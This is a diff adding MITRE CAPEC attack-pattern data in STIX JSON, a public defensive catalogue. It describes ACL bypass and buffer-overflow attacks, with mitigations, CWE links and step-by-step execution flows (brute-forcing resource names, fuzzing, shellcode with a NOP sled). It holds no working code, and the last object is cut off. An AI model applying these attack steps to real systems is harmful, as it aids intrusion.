a/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--ff8ccce6-92b5-43da-81bf-6559100321b4.json b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--ff8ccce6-92b5-43da-81bf-6559100321b4.json new file mode 100644 index 0000000000000000000000000000000000000000..75440d18f023adc48187e6309bda7aea1f33b433 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--ff8ccce6-92b5-43da-81bf-6559100321b4.json 
@@ -0,0 +1,21 @@ +{ + "id": "bundle--c2cfb009-61bb-413f-9cf4-edf36c99adc1", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--ff8ccce6-92b5-43da-81bf-6559100321b4", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--69b6bab3-0a47-402a-b11e-6f7897b75465", + "spec_version": "2.1", + "target_ref": "attack-pattern--51cf3883-1993-49d1-a6c6-169cabf71adb", + "type": "relationship", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--ffb905de-a976-4ece-aa2c-96b818a64df0.json b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--ffb905de-a976-4ece-aa2c-96b818a64df0.json new file mode 100644 index 0000000000000000000000000000000000000000..78ed06dc2e217d1f1eee8fef24cd08281e1ba7c1 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--ffb905de-a976-4ece-aa2c-96b818a64df0.json @@ -0,0 +1,21 @@ +{ + "id": "bundle--5ec4791a-94f4-4931-adad-4bc82f2db6bd", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--ffb905de-a976-4ece-aa2c-96b818a64df0", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--286c9aaa-2118-48dc-bce6-6e3f41adc043", + "spec_version": "2.1", + "target_ref": "attack-pattern--c4a0c765-e4ca-43c2-996e-08ce13ae8f80", + "type": "relationship", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--ffba3f90-bbb1-4ab0-bf6a-750ca56acabd.json b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--ffba3f90-bbb1-4ab0-bf6a-750ca56acabd.json new file mode 100644 index 0000000000000000000000000000000000000000..1476cab38f17aec8fffbd00f3d2eaa5988e0e519 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--ffba3f90-bbb1-4ab0-bf6a-750ca56acabd.json @@ -0,0 +1,21 @@ +{ + "id": "bundle--48d3f2fc-a1a6-4e02-aa22-38d5aa1f8223", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--ffba3f90-bbb1-4ab0-bf6a-750ca56acabd", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--948de9b9-7ad6-4bf5-8daf-f2208db360d6", + "spec_version": "2.1", + "target_ref": "attack-pattern--b89511b6-f0fb-4c1d-a884-a0d5a0d82b4e", + "type": "relationship", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--ffcda0d4-63d6-4980-9ad1-5627a39ccb6e.json b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--ffcda0d4-63d6-4980-9ad1-5627a39ccb6e.json new file mode 100644 index 0000000000000000000000000000000000000000..a796c4d251b6ac4f4effae52f21b3cd87be96a79 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--ffcda0d4-63d6-4980-9ad1-5627a39ccb6e.json 
@@ -0,0 +1,21 @@ +{ + "id": "bundle--fd924bc4-9d4f-4375-9ce0-25388f45bc53", + "objects": [ + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--ffcda0d4-63d6-4980-9ad1-5627a39ccb6e", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--676ce84f-78c4-40f9-96e2-d65ddbfb6b69", + "spec_version": "2.1", + "target_ref": "attack-pattern--c4e18b3f-0445-49e8-9bf1-d47a23082501", + "type": "relationship", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/stix-capec.json b/cti-ATT-CK-v13.1/capec/2.1/stix-capec.json new file mode 100644 index 0000000000000000000000000000000000000000..a1871324f3cc61ebfb2ad9bba67c43351adf9c38 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/stix-capec.json 
@@ -0,0 +1,71474 @@ +{ + "id": "bundle--36b5a045-c220-403a-96c1-02500df07699", + "objects": [ + { + "created": "2023-01-30T20:40:28.791035Z", + "definition": { + "statement": "CAPEC is sponsored by US-CERT in the office of Cybersecurity and Communications at the U.S. Department of Homeland Security. Copyright © 2007 - 2023, The MITRE Corporation. CAPEC and the CAPEC logo are trademarks of The MITRE Corporation." + }, + "definition_type": "statement", + "id": "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d", + "spec_version": "2.1", + "type": "marking-definition" + }, + { + "created": "2023-01-30T20:40:28.791901Z", + "id": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "identity_class": "organization", + "modified": "2023-01-30T20:40:28.791901Z", + "name": "The MITRE Corporation", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "identity" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "In applications, particularly web applications, access to functionality is mitigated by an authorization framework. This framework maps Access Control Lists (ACLs) to elements of the application's functionality; particularly URL's for web apps. In the case that the administrator failed to specify an ACL for a particular element, an attacker may be able to access it with impunity. An attacker with the ability to access functionality not properly constrained by ACLs can obtain sensitive information and possibly compromise the entire application. 
Such an attacker can access resources that must be available only to users at a higher privilege level, can access management sections of the application, or can run queries for data that they otherwise not supposed to.", + "external_references": [ + { + "external_id": "CAPEC-1", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/1.html" + }, + { + "external_id": "CWE-276", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/276.html" + }, + { + "external_id": "CWE-285", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/285.html" + }, + { + "external_id": "CWE-434", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/434.html" + }, + { + "external_id": "CWE-693", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/693.html" + }, + { + "external_id": "CWE-732", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/732.html" + }, + { + "external_id": "CWE-1191", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1191.html" + }, + { + "external_id": "CWE-1193", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1193.html" + }, + { + "external_id": "CWE-1220", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1220.html" + }, + { + "external_id": "CWE-1297", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1297.html" + }, + { + "external_id": "CWE-1311", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1311.html" + }, + { + "external_id": "CWE-1314", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1314.html" + }, + { + "external_id": "CWE-1315", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1315.html" + }, + { + "external_id": "CWE-1318", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1318.html" + }, + { + "external_id": "CWE-1320", + "source_name": "cwe", + "url": 
"http://cwe.mitre.org/data/definitions/1320.html" + }, + { + "external_id": "CWE-1321", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1321.html" + }, + { + "external_id": "CWE-1327", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1327.html" + }, + { + "description": "Hijack Execution Flow: ServicesFile Permissions Weakness", + "external_id": "T1574.010", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1574/010" + } + ], + "id": "attack-pattern--92cdcd3d-d734-4442-afc3-4599f261498b", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Accessing Functionality Not Properly Constrained by ACLs", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_can_precede_refs": [ + "attack-pattern--9ad2c2eb-9939-4590-9683-2e789692d262" + ], + "x_capec_child_of_refs": [ + "attack-pattern--fd669b7d-0e79-473c-9808-a860dfb0c871" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges" + ], + "Confidentiality": [ + "Gain Privileges" + ] + }, + "x_capec_domains": [ + "Software", + "Hardware" + ], + "x_capec_example_instances": [ + "\n Implementing the Model-View-Controller (MVC) within Java EE's Servlet paradigm using a \"Single front controller\" pattern that demands that brokered HTTP requests be authenticated before hand-offs to other Action Servlets.\n If no security-constraint is placed on those Action Servlets, such that positively no one can access them, the front controller can be subverted.\n " + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Survey: The attacker surveys the target application, possibly as a valid and authenticated user

  2. Techniques
    Spidering web sites for all available links
    Brute force guessing of resource names
    Brute force guessing of user names / credentials
    Brute force guessing of function names / actions
  3. Identify Functionality: At each step, the attacker notes the resource or functionality access mechanism invoked upon performing specific actions

  4. Techniques
    Use the web inventory of all forms and inputs and apply attack data to those inputs.
    Use a packet sniffer to capture and record network traffic
    Execute the software in a debugger and record API calls into the operating system or important libraries. This might occur in an environment other than a production environment, in order to find weaknesses that can be exploited in a production environment.

Experiment

  1. Iterate over access capabilities: Possibly as a valid user, the attacker then tries to access each of the noted access mechanisms directly in order to perform functions not constrained by the ACLs.

  2. Techniques
    Fuzzing of API parameters (URL parameters, OS API parameters, protocol parameters)
", + "x_capec_likelihood_of_attack": "High", + "x_capec_parent_of_refs": [ + "attack-pattern--74bac7d9-693d-40d2-82bf-eb132f13bcaf", + "attack-pattern--3ba20dcc-8fec-4d74-a472-eb9694fe8142", + "attack-pattern--1abd165a-57e9-4b78-9221-7b6fcdc57810", + "attack-pattern--e8a8a8f5-3ad5-4d3f-a35b-48036147266b" + ], + "x_capec_prerequisites": [ + "The application must be navigable in a manner that associates elements (subsections) of the application with ACLs.", + "The various resources, or individual URLs, must be somehow discoverable by the attacker", + "The administrator must have forgotten to associate an ACL or has associated an inappropriately permissive ACL with a particular navigable resource." + ], + "x_capec_resources_required": [ + "None: No specialized resources are required to execute this type of attack." + ], + "x_capec_skills_required": { + "Low": "In order to discover unrestricted resources, the attacker does not need special tools or skills. They only have to observe the resources or access mechanisms invoked as each action is performed and then try and access those access mechanisms directly." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "\n In a J2EE setting, administrators can associate a role that is impossible for the authenticator to grant users, such as \"NoAccess\", with all Servlets to which access is guarded by a limited number of servlets visible to, and accessible by, the user.\n Having done so, any direct access to those protected Servlets will be prohibited by the web container.\n In a more general setting, the administrator must mark every resource besides the ones supposed to be exposed to the user as accessible by a role impossible for the user to assume. 
The default security setting must be to deny access and then grant access only to those resources intended by business logic.\n ", + "id": "course-of-action--0d8de0b8-e9fd-44b2-8f1f-f8aae79949be", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-1-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--c796a053-8016-4098-9d01-e680e042cb24", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--0d8de0b8-e9fd-44b2-8f1f-f8aae79949be", + "spec_version": "2.1", + "target_ref": "attack-pattern--92cdcd3d-d734-4442-afc3-4599f261498b", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This attack pattern involves causing a buffer overflow through manipulation of environment variables. Once the adversary finds that they can modify an environment variable, they may try to overflow associated buffers. 
This attack leverages implicit trust often placed in environment variables.", + "external_references": [ + { + "external_id": "CAPEC-10", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/10.html" + }, + { + "external_id": "CWE-120", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/120.html" + }, + { + "external_id": "CWE-302", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/302.html" + }, + { + "external_id": "CWE-118", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/118.html" + }, + { + "external_id": "CWE-119", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/119.html" + }, + { + "external_id": "CWE-74", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/74.html" + }, + { + "external_id": "CWE-99", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/99.html" + }, + { + "external_id": "CWE-20", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/20.html" + }, + { + "external_id": "CWE-680", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/680.html" + }, + { + "external_id": "CWE-733", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/733.html" + }, + { + "external_id": "CWE-697", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/697.html" + }, + { + "description": "Buffer Overflow via Environment Variables", + "source_name": "OWASP Attacks", + "url": "https://owasp.org/www-community/attacks/Buffer_Overflow_via_Environment_Variables" + }, + { + "description": "G. Hoglund, G. 
McGraw, Exploiting Software: How to Break Code, 2004--02, Addison-Wesley", + "external_id": "REF-1", + "source_name": "reference_from_CAPEC" + }, + { + "description": "Sharefuzz", + "external_id": "REF-2", + "source_name": "reference_from_CAPEC", + "url": "http://sharefuzz.sourceforge.net" + } + ], + "id": "attack-pattern--4a29d66d-8617-4382-b456-578ecdb1609e", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Buffer Overflow via Environment Variables", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_can_follow_refs": [ + "attack-pattern--ca989a50-b24e-4917-a234-ce4788fa21c7" + ], + "x_capec_child_of_refs": [ + "attack-pattern--77e51461-7843-411c-a90e-852498957f76" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges" + ], + "Availability": [ + "Unreliable Execution", + "Execute Unauthorized Commands (Run Arbitrary Code)" + ], + "Confidentiality": [ + "Execute Unauthorized Commands (Run Arbitrary Code)", + "Read Data", + "Gain Privileges" + ], + "Integrity": [ + "Execute Unauthorized Commands (Run Arbitrary Code)", + "Modify Data" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "\n A buffer overflow in sccw allows local users to gain root access via the $HOME environmental variable. See also: CVE-1999-0906\n ", + "\n A buffer overflow in the rlogin program involves its consumption of the $TERM environmental variable. See also: CVE-1999-0046\n " + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Identify target application: The adversary identifies a target application or program to perform the buffer overflow on. In this attack the adversary looks for an application that loads the content of an environment variable into a buffer.

Experiment

  1. Find injection vector: The adversary identifies an injection vector to deliver the excessive content to the targeted application's buffer.

  2. Techniques
    Change the values of environment variables thought to be used by the application to contain excessive data. If the program is loading the value of the environment variable into a buffer, this could cause a crash and an attack vector will be found.
  3. Craft overflow content: The adversary crafts the content to be injected. If the intent is to simply cause the software to crash, the content need only consist of an excessive quantity of random data. If the intent is to leverage the overflow for execution of arbitrary code, the adversary crafts the payload in such a way that the overwritten return address is replaced with one of the adversary's choosing.

  4. Techniques
    Create malicious shellcode that will execute when the program execution is returned to it.
    Use a NOP-sled in the overflow content to more easily \"slide\" into the malicious code. This is done so that the exact return address need not be correct, only in the range of all of the NOPs

Exploit

  1. Overflow the buffer: Using the injection vector, the adversary injects the crafted overflow content into the buffer.

", + "x_capec_extended_description": "Although the focus of this attack is putting excessive content into an environment variable that is loaded into a buffer, environment variables can be used to assist a classic buffer overflow attack as well. In the case where the buffer used in a traditional buffer overflow attack is not large enough to store the adversary's shell code, they will store the shell code in an environment variable and attempt to return to its address, rather than back into the data they wrote to the buffer.", + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "The application uses environment variables.", + "An environment variable exposed to the user is vulnerable to a buffer overflow.", + "The vulnerable environment variable uses untrusted data.", + "Tainted data used in the environment variables is not properly validated. For instance boundary checking is not done before copying the input data to a buffer." + ], + "x_capec_skills_required": { + "High": "Exploiting a buffer overflow to inject malicious code into the stack of a software system or even the heap can require a higher skill level.", + "Low": "An attacker can simply overflow a buffer by inserting a long string into an attacker-modifiable injection vector. The result can be a DoS." 
+ }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Do not expose environment variable to the user.", + "id": "course-of-action--0dfd5de3-6691-47d2-abfd-21299e9f040b", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-10-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--6afe60c3-f515-4128-a724-0989e27e5bb0", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--0dfd5de3-6691-47d2-abfd-21299e9f040b", + "spec_version": "2.1", + "target_ref": "attack-pattern--4a29d66d-8617-4382-b456-578ecdb1609e", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Do not use untrusted data in your environment variables.", + "id": "course-of-action--76f448da-5586-4aae-b516-46ff7c52ba87", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-10-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--371669b4-ddf9-41df-b755-093aa08a1c2d", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + 
"relationship_type": "mitigates", + "source_ref": "course-of-action--76f448da-5586-4aae-b516-46ff7c52ba87", + "spec_version": "2.1", + "target_ref": "attack-pattern--4a29d66d-8617-4382-b456-578ecdb1609e", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Use a language or compiler that performs automatic bounds checking", + "id": "course-of-action--950e1236-9a75-40d0-a5f7-1c1777109da5", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-10-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--5981e722-08a7-4513-8c85-f487b377ebfb", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--950e1236-9a75-40d0-a5f7-1c1777109da5", + "spec_version": "2.1", + "target_ref": "attack-pattern--4a29d66d-8617-4382-b456-578ecdb1609e", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "There are tools such as Sharefuzz [REF-2] which is an environment variable fuzzer for Unix that support loading a shared library. 
You can use Sharefuzz to determine if you are exposing an environment variable vulnerable to buffer overflow.", + "id": "course-of-action--9a8c3aec-f2ce-4b6e-b416-33f58933ac90", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-10-3", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--d48d20f4-9361-40f9-81b3-74f2f8b86bea", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--9a8c3aec-f2ce-4b6e-b416-33f58933ac90", + "spec_version": "2.1", + "target_ref": "attack-pattern--4a29d66d-8617-4382-b456-578ecdb1609e", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Buffer Overflow attacks target improper or missing bounds checking on buffer operations, typically triggered by input injected by an adversary. 
As a consequence, an adversary is able to write past the boundaries of allocated buffer regions in memory, causing a program crash or potentially redirection of execution as per the adversaries' choice.", + "external_references": [ + { + "external_id": "CAPEC-100", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/100.html" + }, + { + "external_id": "CWE-120", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/120.html" + }, + { + "external_id": "CWE-119", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/119.html" + }, + { + "external_id": "CWE-131", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/131.html" + }, + { + "external_id": "CWE-129", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/129.html" + }, + { + "external_id": "CWE-805", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/805.html" + }, + { + "external_id": "CWE-680", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/680.html" + }, + { + "description": "Buffer Overflow", + "external_id": "07", + "source_name": "WASC", + "url": "http://projects.webappsec.org/Buffer-Overflow" + }, + { + "description": "Buffer overflow attack", + "source_name": "OWASP Attacks", + "url": "https://owasp.org/www-community/attacks/Buffer_overflow_attack" + }, + { + "description": "OWASP Vulnerabilities, The Open Web Application Security Project (OWASP)", + "external_id": "REF-620", + "source_name": "reference_from_CAPEC", + "url": "https://owasp.org/www-community/vulnerabilities/Buffer_Overflow" + } + ], + "id": "attack-pattern--77e51461-7843-411c-a90e-852498957f76", + "modified": "2021-10-21T00:00:00.000Z", + "name": "Overflow Buffers", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + 
"attack-pattern--476ca631-2695-43f8-82f6-83c06a07ae36" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges" + ], + "Availability": [ + "Unreliable Execution", + "Execute Unauthorized Commands (Run Arbitrary Code)" + ], + "Confidentiality": [ + "Execute Unauthorized Commands (Run Arbitrary Code)", + "Gain Privileges" + ], + "Integrity": [ + "Execute Unauthorized Commands (Run Arbitrary Code)" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "The most straightforward example is an application that reads in input from the user and stores it in an internal buffer but does not check that the size of the input data is less than or equal to the size of the buffer. If the user enters excessive length data, the buffer may overflow leading to the application crashing, or worse, enabling the user to cause execution of injected code.", + "Many web servers enforce security in web applications through the use of filter plugins. An example is the SiteMinder plugin used for authentication. An overflow in such a plugin, possibly through a long URL or redirect parameter, can allow an adversary not only to bypass the security checks but also execute arbitrary code on the target web server in the context of the user that runs the web server process." + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Identify target application: The adversary identifies a target application or program to perform the buffer overflow on. Adversaries often look for applications that accept user input and that perform manual memory management.

Experiment

  1. Find injection vector: The adversary identifies an injection vector to deliver the excessive content to the targeted application's buffer.

  2. Techniques
    Provide large input to a program or application and observe the behavior. If there is a crash, this means that a buffer overflow attack is possible.
  3. Craft overflow content: The adversary crafts the content to be injected. If the intent is to simply cause the software to crash, the content need only consist of an excessive quantity of random data. If the intent is to leverage the overflow for execution of arbitrary code, the adversary crafts the payload in such a way that the overwritten return address is replaced with one of the adversary's choosing.

  4. Techniques
    Create malicious shellcode that will execute when the program execution is returned to it.
    Use a NOP-sled in the overflow content to more easily \"slide\" into the malicious code. This is done so that the exact return address need not be correct, only in the range of all of the NOPs

Exploit

  1. Overflow the buffer: Using the injection vector, the adversary injects the crafted overflow content into the buffer.

", + "x_capec_likelihood_of_attack": "High", + "x_capec_parent_of_refs": [ + "attack-pattern--4a29d66d-8617-4382-b456-578ecdb1609e", + "attack-pattern--c4a0c765-e4ca-43c2-996e-08ce13ae8f80", + "attack-pattern--d591235a-da3b-4872-8962-27fe44fa1ab0", + "attack-pattern--4b856ceb-8bf7-4f0e-b423-89a420455b1d", + "attack-pattern--3c08bb9d-43b5-4468-8b38-387c6cb60da7", + "attack-pattern--d3634072-88f9-4711-987f-6bff7698bd4c", + "attack-pattern--5d5ff43b-cbe7-4986-bfec-cf979f97e6b9", + "attack-pattern--8e403d18-af4e-4abd-bd38-0f99f74b4636", + "attack-pattern--e61f5dd9-d26e-454f-ab07-171f3dea6e73", + "attack-pattern--4cd18074-15c1-4206-8391-115685669623", + "attack-pattern--e62000f0-addd-4156-b9fd-469bbb211d45", + "attack-pattern--b6a2983b-1d97-4698-b210-961ed0523f33" + ], + "x_capec_prerequisites": [ + "Targeted software performs buffer operations.", + "Targeted software inadequately performs bounds-checking on buffer operations.", + "Adversary has the capability to influence the input to buffer operations." + ], + "x_capec_resources_required": [ + "None: No specialized resources are required to execute this type of attack. Detecting and exploiting a buffer overflow does not require any resources beyond knowledge of and access to the target system." + ], + "x_capec_skills_required": { + "High": "In cases of directed overflows, where the motive is to divert the flow of the program or application as per the adversaries' bidding, high level skills are required. This may involve detailed knowledge of the target system architecture and kernel.", + "Low": "In most cases, overflowing a buffer does not require advanced skills beyond the ability to notice an overflow and stuff an input variable with content." 
+ }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Very High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Use a language or compiler that performs automatic bounds checking.", + "id": "course-of-action--a253c485-f225-4dd3-b0ba-dbe4b29fa134", + "modified": "2021-10-21T00:00:00.000Z", + "name": "coa-100-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--cedea035-6835-4307-a59b-acd58ec23ecd", + "modified": "2021-10-21T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--a253c485-f225-4dd3-b0ba-dbe4b29fa134", + "spec_version": "2.1", + "target_ref": 